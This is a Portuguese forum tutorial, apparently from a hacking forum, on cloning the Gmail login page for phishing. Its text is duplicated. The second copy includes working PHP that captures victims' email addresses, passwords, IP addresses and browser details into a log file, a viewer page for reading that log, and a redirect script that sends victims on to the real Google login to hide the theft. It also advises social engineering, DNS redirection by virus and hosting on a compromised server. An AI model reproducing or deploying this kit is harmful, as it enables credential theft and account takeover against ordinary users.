Paginas Fake - Forma mais simples
RECOMENDADO:Conhecimentos em HTML e PHP
Resumo da operação
A forma mais simples de se fazer uma pagina fake é simplesmente vc baixar ela toda(codigo html,js e imagens - o navegador ja tem opção pra isso) e entao fazer uns ajustes. Os ajustes são:
1 - Deixar as imagens linkadas naturalmente pra pagina original caso as que você baixar nao funcionem ou não carregem corretamente
2 - Direcionar os formularios em que as informações desejadas serão inseridas para o script php que irá salvar essas informações
Depois dos ajustes fica faltando fazer o script(que vou explicar depois) e hospedar o script e a pagina fake. E então,como a vitima digita os dados dela assim? Como em qualquer outra forma,vc precisa de engenharia social e formas de aplicação, induzindo-o a usar essa pagina. Esse tipo de pagina fake é mais util para usos locais,em computadores onde possa ser causado redirecionamento do DNS,pode-se usar alguns virus para isso tambem.
Maos na massa
Como é um tutorial,vamos pegar uma pagina simples: gmail.com
Essa aqui é a pagina real:
Vamos salva-la:
E a copia ficara identica:
O que resta agora é alterar o codigo html e montar o script php. Vamos começar pelo script.
Abrindo o codigo fonte da pagina que baixamos(a cópia) em um editor de texto,você deve procurar pela string <form e,se nao achar de primeira,em breve acaba encontrado o que procura:
Entao vamos pegar as informações que achamos ai e jogar no nosso gmail.php:
Os campos que queremos são: Email e Passwd. Esse script pega uns detalhes a mais tbm.
Feito o script,basta salvar e direcionar a action do form da copia que foi feita para ele:
Esse script que fiz gera um log em um arquivo txt chamado Dados.txt com codigo html que é lido por outros script php,eu chamo ele de ler.php:
Alem disso incluo tambem um script de redirecionamento que manda as informações para o site real,assim a vitima nao percebe que caiu em um golpe(ou pelo menos a maioria delas):
Ufa...acabou a parte de programação
Hospedagem
O unico requisito do host é que ele tenha suporte para php e um diretorio que permita escrita por parte do script.Pode ser qualquer host free que permita isso,mas eu prefiro usar um host "mais privado":
Uma shell resolve seus problemas.
Basta upar:
Vamos ao teste!:
E entao vamos ver o ler.php:
Os scripts NAO SERÂO ESTÁTICOS,voce pode precisar de mais scripts para sistemas que tem logins em mais de uma etapa.O script de redirecionamento pode ser aperfeiçoado,com certeza,pois ele nao loga o usuario na pagina real,isso só pode fazer ele talvez pensar q errou a senha ou clicou f5. Preste atenção no codigo sempre e teste as paginas fakes antes,sempre.
Dica: Crie o Dados.txt,em alguns servidores ele não será gerado sozinho pelo script.
Mas e o link?grande...dificil de aplicar o golpe!!
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... pode lhe ajudar.
A essa altura alguns vao estar desapontados,pensando que era algo mais facil ou mais "magico".Porem essa é a real forma simples de se utilizar fakes. Voce precisa se utilizar de Engenharia Social,de algum tipo,ou metodos de redirecionamento.
Se voce está atras de metodos mais completos/complexos:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Tem esse otimo post do Hackuv
Se pegar dá os creditos
RECOMENDADO:Conhecimentos em HTML e PHP
Resumo da operação
A forma mais simples de se fazer uma pagina fake é simplesmente vc baixar ela toda(codigo html,js e imagens - o navegador ja tem opção pra isso) e entao fazer uns ajustes. Os ajustes são:
1 - Deixar as imagens linkadas naturalmente pra pagina original caso as que você baixar nao funcionem ou não carregem corretamente
2 - Direcionar os formularios em que as informações desejadas serão inseridas para o script php que irá salvar essas informações
Depois dos ajustes fica faltando fazer o script(que vou explicar depois) e hospedar o script e a pagina fake. E então,como a vitima digita os dados dela assim? Como em qualquer outra forma,vc precisa de engenharia social e formas de aplicação, induzindo-o a usar essa pagina. Esse tipo de pagina fake é mais util para usos locais,em computadores onde possa ser causado redirecionamento do DNS,pode-se usar alguns virus para isso tambem.
Maos na massa
Como é um tutorial,vamos pegar uma pagina simples: gmail.com
Essa aqui é a pagina real:
Vamos salva-la:
E a copia ficara identica:
O que resta agora é alterar o codigo html e montar o script php. Vamos começar pelo script.
Abrindo o codigo fonte da pagina que baixamos(a cópia) em um editor de texto,você deve procurar pela string <form e,se nao achar de primeira,em breve acaba encontrado o que procura:
Entao vamos pegar as informações que achamos ai e jogar no nosso gmail.php:
Código:
<?php //Grava os dados recebidos $nome = $_POST["Email"]; $tit = $_POST["Passwd"]; //Pega Dia $data = date("d/m/Y - H:i:s"); //Pega IP $ip = getenv("REMOTE_ADDR"); //Pega Tipo de Navegador $navegador = $_SERVER['HTTP_USER_AGENT']; //Cria um campos em HTML com Login,senha,IP,navegador $msg = "<center><table><tr><td><b><h4><font color='red'>Login</font></h4></b></td></tr><tr><td><b>Usuario: </b>$nome</font></td></tr>"; $msg .= "<tr><td><b>Senha: </b>$tit</font></td></tr>"; $msg .= "<tr><td><b>Data: </b>$data</font></td></tr>"; $msg .= "<tr><td><b>IP: </b>$ip</font></td></tr>"; $msg .= "<tr><td><b>Navegador: </b> $navegador</font></td></tr>"; $msg .= "</table>"; //Cria arquivo dados.txt que vai ter todos os dados de login $ponteiro = fopen ("Dados.txt", "a"); fwrite($ponteiro, "$msg\n\n"); fclose ($ponteiro); //Adiciona arquivo para redirecionar para uma nova página. include "redirection.php"; ?> </body> </html>
Feito o script,basta salvar e direcionar a action do form da copia que foi feita para ele:
Esse script que fiz gera um log em um arquivo txt chamado Dados.txt com codigo html que é lido por outros script php,eu chamo ele de ler.php:
Código:
<html> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> </head> <body> <?php include "Dados.txt"; ?> </body> </html>
Código:
<script> //Página que será aberta. document.location="https://accounts.google.com/ServiceLoginAuth"; </script><?php $_POST["Email"] = $nome; $_POST["Passwd"] = $tit; ?>
Hospedagem
O unico requisito do host é que ele tenha suporte para php e um diretorio que permita escrita por parte do script.Pode ser qualquer host free que permita isso,mas eu prefiro usar um host "mais privado":
Uma shell resolve seus problemas.
Basta upar:
Vamos ao teste!:
E entao vamos ver o ler.php:
Os scripts NAO SERÂO ESTÁTICOS,voce pode precisar de mais scripts para sistemas que tem logins em mais de uma etapa.O script de redirecionamento pode ser aperfeiçoado,com certeza,pois ele nao loga o usuario na pagina real,isso só pode fazer ele talvez pensar q errou a senha ou clicou f5. Preste atenção no codigo sempre e teste as paginas fakes antes,sempre.
Dica: Crie o Dados.txt,em alguns servidores ele não será gerado sozinho pelo script.
Mas e o link?grande...dificil de aplicar o golpe!!
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... pode lhe ajudar.
A essa altura alguns vao estar desapontados,pensando que era algo mais facil ou mais "magico".Porem essa é a real forma simples de se utilizar fakes. Voce precisa se utilizar de Engenharia Social,de algum tipo,ou metodos de redirecionamento.
Se voce está atras de metodos mais completos/complexos:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Tem esse otimo post do Hackuv
Se pegar dá os creditos
Comment